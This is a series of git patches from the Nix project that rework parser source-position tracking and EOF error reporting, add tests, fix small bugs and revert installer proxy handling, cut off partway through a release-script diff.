+        using pointer = const std::string_view *;
+        using iterator_category = std::input_iterator_tag;
+
+        LinesIterator(): pastEnd(true) {}
+        explicit LinesIterator(std::string_view input): input(input), pastEnd(input.empty()) {
+            if (!pastEnd)
+                bump(true);
+        }
+
+        LinesIterator & operator++() {
+            bump(false);
+            return *this;
+        }
+        LinesIterator operator++(int) {
+            auto result = *this;
+            ++*this;
+            return result;
+        }
+
+        reference operator*() const { return curLine; }
+        pointer operator->() const { return &curLine; }
+
+        bool operator!=(const LinesIterator & other) const {
+            return !(*this == other);
+        }
+        bool operator==(const LinesIterator & other) const {
+            return (pastEnd && other.pastEnd)
+                || (std::forward_as_tuple(input.size(), input.data())
+                    == std::forward_as_tuple(other.input.size(), other.input.data()));
+        }
+
+    private:
+        std::string_view input, curLine;
+        bool pastEnd = false;
+
+        void bump(bool atFirst);
+    };
 };
 
 std::ostream & operator<<(std::ostream & str, const Pos & pos);
diff --git a/tests/functional/lang/eval-fail-eol-1.err.exp b/tests/functional/lang/eval-fail-eol-1.err.exp
new file mode 100644
index 000000000..3f5a5c22c
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-1.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-1.nix b/tests/functional/lang/eval-fail-eol-1.nix
new file mode 100644
index 000000000..476223919
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-2.err.exp b/tests/functional/lang/eval-fail-eol-2.err.exp
new file mode 100644
index 000000000..ff13e2d55
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-2.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-2.nix b/tests/functional/lang/eval-fail-eol-2.nix
new file mode 100644
index 000000000..0cf92a425
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.nix
@@ -0,0 +1,2 @@
+# foo
invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-3.err.exp b/tests/functional/lang/eval-fail-eol-3.err.exp
new file mode 100644
index 000000000..ada3c5ecd
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-3.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-3.nix b/tests/functional/lang/eval-fail-eol-3.nix
new file mode 100644
index 000000000..33422452d
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar

From 855fd5a1bb781e4f722c1d757ba43e866d370132 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 577/654] diagnose "unexpected EOF" at EOF

this needs a string comparison because there seems to be no other way to
get that information out of bison. usually the location info is going to
be correct (pointing at a bad token), but since EOF isn't a token as
such it'll be wrong in this case.

this hasn't shown up much so far because a single line ending *is* a
token, so any file formatted in the usual manner (ie, ending in a line
ending) would have its EOF position reported correctly.
---
 src/libexpr/parser.y                                   | 4 ++++
 tests/functional/lang/parse-fail-eof-in-string.err.exp | 4 ++--
 tests/functional/lang/parse-fail-eof-pos.err.exp       | 5 +++++
 tests/functional/lang/parse-fail-eof-pos.nix           | 2 ++
 4 files changed, 13 insertions(+), 2 deletions(-)
 create mode 100644 tests/functional/lang/parse-fail-eof-pos.err.exp
 create mode 100644 tests/functional/lang/parse-fail-eof-pos.nix

diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 9a543d636..59f088d53 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -64,6 +64,10 @@ using namespace nix;
 
 void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error)
 {
+    if (std::string_view(error).starts_with("syntax error, unexpected end of file")) {
+        loc->first_column = loc->last_column;
+        loc->first_line = loc->last_line;
+    }
     throw ParseError({
         .msg = HintFmt(error),
         .pos = state->positions[state->at(*loc)]
diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp
index b28d35950..17f34b62d 100644
--- a/tests/functional/lang/parse-fail-eof-in-string.err.exp
+++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp
@@ -1,5 +1,5 @@
 error: syntax error, unexpected end of file, expecting '"'
-       at «stdin»:3:5:
+       at «stdin»:3:6:
             2| # Note that this file must not end with a newline.
             3| a 1"$
-             |     ^
+             |      ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.err.exp b/tests/functional/lang/parse-fail-eof-pos.err.exp
new file mode 100644
index 000000000..ef9ca381c
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.err.exp
@@ -0,0 +1,5 @@
+error: syntax error, unexpected end of file
+       at «stdin»:3:1:
+            2| # no content
+            3|
+             | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.nix b/tests/functional/lang/parse-fail-eof-pos.nix
new file mode 100644
index 000000000..bd66a2c98
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.nix
@@ -0,0 +1,2 @@
+(
+# no content

From 5d9fdab3de0ee17c71369ad05806b9ea06dfceda Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 578/654] use byte indexed locations for PosIdx

we now keep not a table of all positions, but a table of all origins and
their sizes. position indices are now direct pointers into the virtual
concatenation of all parsed contents. this slightly reduces memory usage
and time spent in the parser, at the cost of not being able to report
positions if the total input size exceeds 4GiB. this limit is not unique
to nix though, rustc and clang also limit their input to 4GiB (although
at least clang refuses to process inputs that are larger, we will not).

this new 4GiB limit probably will not cause any problems for quite a
while, all of nixpkgs together is less than 100MiB in size and already
needs over 700MiB of memory and multiple seconds just to parse. 4GiB
worth of input will easily take multiple minutes and over 30GiB of
memory without even evaluating anything. if problems *do* arise we can
probably recover the old table-based system by adding some tracking to
Pos::Origin (or increasing the size of PosIdx outright), but for time
being this looks like more complexity than it's worth.

since we now need to read the entire input again to determine the
line/column of a position we'll make unsafeGetAttrPos slightly lazy:
mostly the set it returns is only used to determine the file of origin
of an attribute, not its exact location. the thunks do not add
measurable runtime overhead.

notably this change is necessary to allow changing the parser since
apparently nothing supports nix's very idiosyncratic line ending choice
of "anything goes", making it very hard to calculate line/column
positions in the parser (while byte offsets are very easy).
---
 src/libexpr/eval.cc               |  7 +--
 src/libexpr/flake/flake.cc        |  3 +-
 src/libexpr/lexer.l               | 23 +-------
 src/libexpr/nixexpr.cc            | 33 +++++++++++
 src/libexpr/nixexpr.hh            |  1 -
 src/libexpr/parser-state.hh       |  9 +--
 src/libexpr/parser.y              |  2 +-
 src/libexpr/pos-idx.hh            |  1 +
 src/libexpr/pos-table.hh          | 92 ++++++++++++++++---------------
 src/libexpr/primops.cc            | 48 ++++++++++++++++
 src/libexpr/primops.hh            |  2 +
 tests/unit/libexpr/primops.cc     |  6 +-
 tests/unit/libexpr/value/print.cc |  8 +--
 13 files changed, 150 insertions(+), 85 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 3d22723b3..bbccfcd29 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -949,12 +949,11 @@ void EvalState::mkThunk_(Value & v, Expr * expr)
 
 void EvalState::mkPos(Value & v, PosIdx p)
 {
-    auto pos = positions[p];
-    if (auto path = std::get_if<SourcePath>(&pos.origin)) {
+    auto origin = positions.originOf(p);
+    if (auto path = std::get_if<SourcePath>(&origin)) {
         auto attrs = buildBindings(3);
         attrs.alloc(sFile).mkString(path->path.abs());
-        attrs.alloc(sLine).mkInt(pos.line);
-        attrs.alloc(sColumn).mkInt(pos.column);
+        makePositionThunks(*this, p, attrs.alloc(sLine), attrs.alloc(sColumn));
         v.mkAttrs(attrs);
     } else
         v.mkNull();
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index fd9341504..dd8924859 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -212,11 +212,10 @@ static Flake readFlake(
 {
     auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
 
+    // NOTE evalFile forces vInfo to be an attrset because mustBeTrivial is true.
     Value vInfo;
     state.evalFile(flakePath, vInfo, true);
 
-    expectType(state, nAttrs, vInfo, state.positions.add(Pos::Origin(rootDir), 1, 1));
-
     Flake flake {
         .originalRef = originalRef,
         .resolvedRef = resolvedRef,
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 5b26d6927..ee2b6b807 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -33,33 +33,16 @@ namespace nix {
 
 static void initLoc(YYLTYPE * loc)
 {
-    loc->first_line = loc->last_line = 1;
-    loc->first_column = loc->last_column = 1;
+    loc->first_line = loc->last_line = 0;
+    loc->first_column = loc->last_column = 0;
 }
 
 static void adjustLoc(YYLTYPE * loc, const char * s, size_t len)
 {
     loc->stash();
 
-    loc->first_line = loc->last_line;
     loc->first_column = loc->last_column;
-
-    for (size_t i = 0; i < len; i++) {
-       switch (*s++) {
-       case '\r':
-           if (*s == '\n') { /* cr/lf */
-               i++;
-               s++;
-           }
-           /* fall through */
-       case '\n':
-           ++loc->last_line;
-           loc->last_column = 1;
-           break;
-       default:
-           ++loc->last_column;
-       }
-    }
+    loc->last_column += len;
 }
 
 
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 9a8b9616b..5bdc466eb 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -583,6 +583,39 @@ std::string ExprLambda::showNamePos(const EvalState & state) const
 
 
 
+/* Position table. */
+
+Pos PosTable::operator[](PosIdx p) const
+{
+    auto origin = resolve(p);
+    if (!origin)
+        return {};
+
+    const auto offset = origin->offsetOf(p);
+
+    Pos result{0, 0, origin->origin};
+    auto lines = this->lines.lock();
+    auto linesForInput = (*lines)[origin->offset];
+
+    if (linesForInput.empty()) {
+        auto source = result.getSource().value_or("");
+        const char * begin = source.data();
+        for (Pos::LinesIterator it(source), end; it != end; it++)
+            linesForInput.push_back(it->data() - begin);
+        if (linesForInput.empty())
+            linesForInput.push_back(0);
+    }
+    // as above: the first line starts at byte 0 and is always present
+    auto lineStartOffset = std::prev(
+        std::upper_bound(linesForInput.begin(), linesForInput.end(), offset));
+
+    result.line = 1 + (lineStartOffset - linesForInput.begin());
+    result.column = 1 + (offset - *lineStartOffset);
+    return result;
+}
+
+
+
 /* Symbol table. */
 
 size_t SymbolTable::totalSize() const
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 94356759b..e3cae8385 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -7,7 +7,6 @@
 #include "value.hh"
 #include "symbol-table.hh"
 #include "error.hh"
-#include "chunked-vector.hh"
 #include "position.hh"
 #include "eval-error.hh"
 #include "pos-idx.hh"
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 34aef661f..024e79c43 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -24,20 +24,15 @@ struct ParserLocation
     int last_line, last_column;
 
     // backup to recover from yyless(0)
-    int stashed_first_line, stashed_first_column;
-    int stashed_last_line, stashed_last_column;
+    int stashed_first_column, stashed_last_column;
 
     void stash() {
-        stashed_first_line = first_line;
         stashed_first_column = first_column;
-        stashed_last_line = last_line;
         stashed_last_column = last_column;
     }
 
     void unstash() {
-        first_line = stashed_first_line;
         first_column = stashed_first_column;
-        last_line = stashed_last_line;
         last_column = stashed_last_column;
     }
 };
@@ -276,7 +271,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos,
 
 inline PosIdx ParserState::at(const ParserLocation & loc)
 {
-    return positions.add(origin, loc.first_line, loc.first_column);
+    return positions.add(origin, loc.first_column);
 }
 
 }
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 59f088d53..bff066170 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -438,7 +438,7 @@ Expr * parseExprFromBuf(
         .symbols = symbols,
         .positions = positions,
         .basePath = basePath,
-        .origin = {origin},
+        .origin = positions.addOrigin(origin, length),
         .rootFS = rootFS,
         .s = astSymbols,
     };
diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh
index 9949f1dc5..e94fd85c6 100644
--- a/src/libexpr/pos-idx.hh
+++ b/src/libexpr/pos-idx.hh
@@ -6,6 +6,7 @@ namespace nix {
 
 class PosIdx
 {
+    friend struct LazyPosAcessors;
     friend class PosTable;
 
 private:
diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh
index 1decf3c85..8a0a3ba86 100644
--- a/src/libexpr/pos-table.hh
+++ b/src/libexpr/pos-table.hh
@@ -7,6 +7,7 @@
 #include "chunked-vector.hh"
 #include "pos-idx.hh"
 #include "position.hh"
+#include "sync.hh"
 
 namespace nix {
 
@@ -17,66 +18,69 @@ public:
     {
         friend PosTable;
     private:
-        // must always be invalid by default, add() replaces this with the actual value.
-        // subsequent add() calls use this index as a token to quickly check whether the
-        // current origins.back() can be reused or not.
-        mutable uint32_t idx = std::numeric_limits<uint32_t>::max();
+        uint32_t offset;
 
-        // Used for searching in PosTable::[].
-        explicit Origin(uint32_t idx)
-            : idx(idx)
-            , origin{std::monostate()}
-        {
-        }
+        Origin(Pos::Origin origin, uint32_t offset, size_t size):
+            offset(offset), origin(origin), size(size)
+        {}
 
     public:
         const Pos::Origin origin;
+        const size_t size;
 
-        Origin(Pos::Origin origin)
-            : origin(origin)
+        uint32_t offsetOf(PosIdx p) const
         {
+            return p.id - 1 - offset;
         }
     };
 
-    struct Offset
-    {
-        uint32_t line, column;
-    };
-
 private:
-    std::vector<Origin> origins;
-    ChunkedVector<Offset, 8192> offsets;
+    using Lines = std::vector<uint32_t>;
 
-public:
-    PosTable()
-        : offsets(1024)
-    {
-        origins.reserve(1024);
-    }
+    std::map<uint32_t, Origin> origins;
+    mutable Sync<std::map<uint32_t, Lines>> lines;
 
-    PosIdx add(const Origin & origin, uint32_t line, uint32_t column)
+    const Origin * resolve(PosIdx p) const
     {
-        const auto idx = offsets.add({line, column}).second;
-        if (origins.empty() || origins.back().idx != origin.idx) {
-            origin.idx = idx;
-            origins.push_back(origin);
-        }
-        return PosIdx(idx + 1);
-    }
+        if (p.id == 0)
+            return nullptr;
 
-    Pos operator[](PosIdx p) const
-    {
-        if (p.id == 0 || p.id > offsets.size())
-            return {};
         const auto idx = p.id - 1;
         /* we want the last key <= idx, so we'll take prev(first key > idx).
-           this is guaranteed to never rewind origin.begin because the first
-           key is always 0. */
-        const auto pastOrigin = std::upper_bound(
-            origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; });
-        const auto origin = *std::prev(pastOrigin);
-        const auto offset = offsets[idx];
-        return {offset.line, offset.column, origin.origin};
+            this is guaranteed to never rewind origin.begin because the first
+            key is always 0. */
+        const auto pastOrigin = origins.upper_bound(idx);
+        return &std::prev(pastOrigin)->second;
+    }
+
+public:
+    Origin addOrigin(Pos::Origin origin, size_t size)
+    {
+        uint32_t offset = 0;
+        if (auto it = origins.rbegin(); it != origins.rend())
+            offset = it->first + it->second.size;
+        // +1 because all PosIdx are offset by 1 to begin with, and
+        // another +1 to ensure that all origins can point to EOF, eg
+        // on (invalid) empty inputs.
+        if (2 + offset + size < offset)
+            return Origin{origin, offset, 0};
+        return origins.emplace(offset, Origin{origin, offset, size}).first->second;
+    }
+
+    PosIdx add(const Origin & origin, size_t offset)
+    {
+        if (offset > origin.size)
+            return PosIdx();
+        return PosIdx(1 + origin.offset + offset);
+    }
+
+    Pos operator[](PosIdx p) const;
+
+    Pos::Origin originOf(PosIdx p) const
+    {
+        if (auto o = resolve(p))
+            return o->origin;
+        return std::monostate{};
     }
 };
 
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 78f7f71ed..a7687fa06 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2524,6 +2524,54 @@ static RegisterPrimOp primop_unsafeGetAttrPos(PrimOp {
     .fun = prim_unsafeGetAttrPos,
 });
 
+// access to exact position information (ie, line and column numbers) is deferred
+// due to the cost associated with calculating that information and how rarely
+// it is used in practice. this is achieved by creating thunks to otherwise
+// inaccessible primops that are not exposed as __op or under builtins to turn
+// the internal PosIdx back into a line and column number, respectively. exposing
+// these primops in any way would at best be not useful and at worst create wildly
+// indeterministic eval results depending on parse order of files.
+//
+// in a simpler world this would instead be implemented as another kind of thunk,
+// but each type of thunk has an associated runtime cost in the current evaluator.
+// as with black holes this cost is too high to justify another thunk type to check
+// for in the very hot path that is forceValue.
+static struct LazyPosAcessors {
+    PrimOp primop_lineOfPos{
+        .arity = 1,
+        .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+            v.mkInt(state.positions[PosIdx(args[0]->integer)].line);
+        }
+    };
+    PrimOp primop_columnOfPos{
+        .arity = 1,
+        .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+            v.mkInt(state.positions[PosIdx(args[0]->integer)].column);
+        }
+    };
+
+    Value lineOfPos, columnOfPos;
+
+    LazyPosAcessors()
+    {
+        lineOfPos.mkPrimOp(&primop_lineOfPos);
+        columnOfPos.mkPrimOp(&primop_columnOfPos);
+    }
+
+    void operator()(EvalState & state, const PosIdx pos, Value & line, Value & column)
+    {
+        Value * posV = state.allocValue();
+        posV->mkInt(pos.id);
+        line.mkApp(&lineOfPos, posV);
+        column.mkApp(&columnOfPos, posV);
+    }
+} makeLazyPosAccessors;
+
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column)
+{
+    makeLazyPosAccessors(state, pos, line, column);
+}
+
 /* Dynamic version of the `?' operator. */
 static void prim_hasAttr(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh
index 45486608f..9f76975db 100644
--- a/src/libexpr/primops.hh
+++ b/src/libexpr/primops.hh
@@ -51,4 +51,6 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu
  */
 void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v);
 
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column);
+
 }
diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc
index 6d7649b3c..b1426edae 100644
--- a/tests/unit/libexpr/primops.cc
+++ b/tests/unit/libexpr/primops.cc
@@ -151,7 +151,7 @@ namespace nix {
     }
 
     TEST_F(PrimOpTest, unsafeGetAttrPos) {
-        state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }");
+        state.corepkgsFS->addFile(CanonPath("foo.nix"), "\n\r\n\r{ y = \"x\"; }");
 
         auto expr = "builtins.unsafeGetAttrPos \"y\" (import )";
         auto v = eval(expr);
@@ -165,10 +165,12 @@ namespace nix {
 
         auto line = v.attrs->find(createSymbol("line"));
         ASSERT_NE(line, nullptr);
-        ASSERT_THAT(*line->value, IsIntEq(1));
+        state.forceValue(*line->value, noPos);
+        ASSERT_THAT(*line->value, IsIntEq(4));
 
         auto column = v.attrs->find(createSymbol("column"));
         ASSERT_NE(column, nullptr);
+        state.forceValue(*column->value, noPos);
         ASSERT_THAT(*column->value, IsIntEq(3));
     }
 
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index aabf156c2..d2d699a64 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -110,8 +110,8 @@ TEST_F(ValuePrintingTests, vLambda)
         .up = nullptr,
         .values = { }
     };
-    PosTable::Origin origin((std::monostate()));
-    auto posIdx = state.positions.add(origin, 1, 1);
+    PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+    auto posIdx = state.positions.add(origin, 0);
     auto body = ExprInt(0);
     auto formals = Formals {};
 
@@ -558,8 +558,8 @@ TEST_F(ValuePrintingTests, ansiColorsLambda)
         .up = nullptr,
         .values = { }
     };
-    PosTable::Origin origin((std::monostate()));
-    auto posIdx = state.positions.add(origin, 1, 1);
+    PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+    auto posIdx = state.positions.add(origin, 0);
     auto body = ExprInt(0);
     auto formals = Formals {};
 

From e4500e539eae64a79ed5309a9c48475edae96218 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Thu, 7 Mar 2024 00:02:21 +0100
Subject: [PATCH 579/654] doc/glossary: Fix file system object anchor

It was stealing the store object id. Browsers pick the first one.
It was confusing.
---
 doc/manual/src/glossary.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index a71b2e2b3..c4d9c2a52 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -86,7 +86,7 @@
 
   [store path]: #gloss-store-path
 
-- [file system object]{#gloss-store-object}
+- [file system object]{#gloss-file-system-object}
 
   The Nix data model for representing simplified file system data.
 

From 9c64a09c709e3f995d7f24cdd5a69435c08488fc Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Wed, 6 Mar 2024 20:52:58 -0800
Subject: [PATCH 580/654] fix: bounds check result in getMaxCPU

Fixes https://github.com/NixOS/nix/issues/9725
---
 src/libutil/current-process.cc | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc
index 47aa137d8..f80f43ef0 100644
--- a/src/libutil/current-process.cc
+++ b/src/libutil/current-process.cc
@@ -38,6 +38,11 @@ unsigned int getMaxCPU()
 
         auto cpuMax = readFile(cpuFile);
         auto cpuMaxParts = tokenizeString>(cpuMax, " \n");
+
+        if (cpuMaxParts.size() != 2) {
+            return 0;
+        }
+
         auto quota = cpuMaxParts[0];
         auto period = cpuMaxParts[1];
         if (quota != "max")

From 739f53aca4f7971165150b910061903c7d015ca6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 08:52:43 +0100
Subject: [PATCH 581/654] Revert "Fix sudo in the darwin installer (#10128)"

This reverts commit 686405ef416955621a89815e07cb64e1ee4f1495.
---
 scripts/install-multi-user.sh | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 4d6a1914e..1dbb93bf9 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -69,17 +69,16 @@ readonly PROXY_ENVIRONMENT_VARIABLES=(
     NO_PROXY
 )
 
-SUDO_KEPT_ENVIRONMENT_VARIABLES=""
+SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
 
 setup_sudo_extra_environment_variables() {
+    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
     for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
         if [ "x${!variable:-}" != "x" ]; then
-            SUDO_KEPT_ENVIRONMENT_VARIABLES="$SUDO_KEPT_ENVIRONMENT_VARIABLES,$variable"
+            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
+            i=$((i + 1))
         fi
     done
-
-    # Required by the darwin installer
-    export SUDO_KEPT_ENVIRONMENT_VARIABLES
 }
 
 setup_sudo_extra_environment_variables
@@ -387,7 +386,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo --preserve-env="$SUDO_KEPT_ENVIRONMENT_VARIABLES" "$@"
+        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
     fi
 }
 

From f175b3a4b755d1955787d66bbf8e2ee483f2b192 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 08:53:14 +0100
Subject: [PATCH 582/654] Revert "`install-multi-user.sh`: `_sudo`: add proxy
 variables to sudo"

This reverts commit 24fd7e2755bed3a854f8089c2db2fed89eb07f56.
---
 scripts/install-multi-user.sh | 27 +--------------------------
 1 file changed, 1 insertion(+), 26 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..ad3ee8881 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,31 +58,6 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
 
 readonly ROOT_HOME=~root
 
-readonly PROXY_ENVIRONMENT_VARIABLES=(
-    http_proxy
-    https_proxy
-    ftp_proxy
-    no_proxy
-    HTTP_PROXY
-    HTTPS_PROXY
-    FTP_PROXY
-    NO_PROXY
-)
-
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
-
-setup_sudo_extra_environment_variables() {
-    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
-    for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
-        if [ "x${!variable:-}" != "x" ]; then
-            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
-            i=$((i + 1))
-        fi
-    done
-}
-
-setup_sudo_extra_environment_variables
-
 if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
     readonly IS_HEADLESS='no'
 else
@@ -386,7 +361,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+        sudo "$@"
     fi
 }
 

From 0282499e183c3a7aa4aa263b242f4ddcb401220f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 7 Mar 2024 13:28:52 +0100
Subject: [PATCH 583/654] PathInputScheme::getFingerprint(): Don't barf on
 relative paths

This wasn't caught by CI because #10149 and #10152 pass
individually... It doesn't happen on lazy-trees either because we
never try to fetch relative path flakes (#10089).
---
 src/libfetchers/path.cc | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index f1910a5dc..0af1bad73 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -89,6 +89,15 @@ struct PathInputScheme : InputScheme
         writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
     }
 
+    std::optional isRelative(const Input & input) const
+    {
+        auto path = getStrAttr(input.attrs, "path");
+        if (hasPrefix(path, "/"))
+            return std::nullopt;
+        else
+            return path;
+    }
+
     bool isLocked(const Input & input) const override
     {
         return (bool) input.getNarHash();
@@ -151,6 +160,9 @@ struct PathInputScheme : InputScheme
 
     std::optional getFingerprint(ref store, const Input & input) const override
     {
+        if (isRelative(input))
+            return std::nullopt;
+
         /* If this path is in the Nix store, use the hash of the
            store object and the subpath. */
         auto path = getAbsPath(input);

From a3163b9eabb952b4aa96e376dea95ebcca97b31a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 14:52:40 +0100
Subject: [PATCH 584/654] Fix the outputs moving on macOS

---
 src/libstore/build/local-derivation-goal.cc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index 6e8e1fa18..a9b6a8dbf 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2547,8 +2547,8 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 // Replace the output by a fresh copy of itself to make sure
                 // that there's no stale file descriptor pointing to it
                 Path tmpOutput = actualPath + ".tmp";
-                renameFile(actualPath, tmpOutput);
-                copyFile(tmpOutput, actualPath, true);
+                copyFile(actualPath, tmpOutput, true);
+                renameFile(tmpOutput, actualPath);
 
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,

From 091f2328962fccfd71602b0b7c072c8d08291c86 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 7 Mar 2024 15:18:03 +0100
Subject: [PATCH 585/654] maintainers/upload-release.pl: Handle 2.3 and 2.18
 branches

---
 maintainers/upload-release.pl | 69 ++++++++++++++++++++++++-----------
 1 file changed, 47 insertions(+), 22 deletions(-)

diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl
index 4e2c379f0..f2830a3af 100755
--- a/maintainers/upload-release.pl
+++ b/maintainers/upload-release.pl
@@ -11,6 +11,8 @@ use JSON::PP;
 use LWP::UserAgent;
 use Net::Amazon::S3;
 
+delete $ENV{'shell'}; # shut up a LWP::UserAgent.pm warning
+
 my $evalId = $ARGV[0] or die "Usage: $0 EVAL-ID\n";
 
 my $releasesBucketName = "nix-releases";
@@ -36,9 +38,9 @@ sub fetch {
 my $evalUrl = "https://hydra.nixos.org/eval/$evalId";
 my $evalInfo = decode_json(fetch($evalUrl, 'application/json'));
 #print Dumper($evalInfo);
-my $flakeUrl = $evalInfo->{flake} or die;
-my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die);
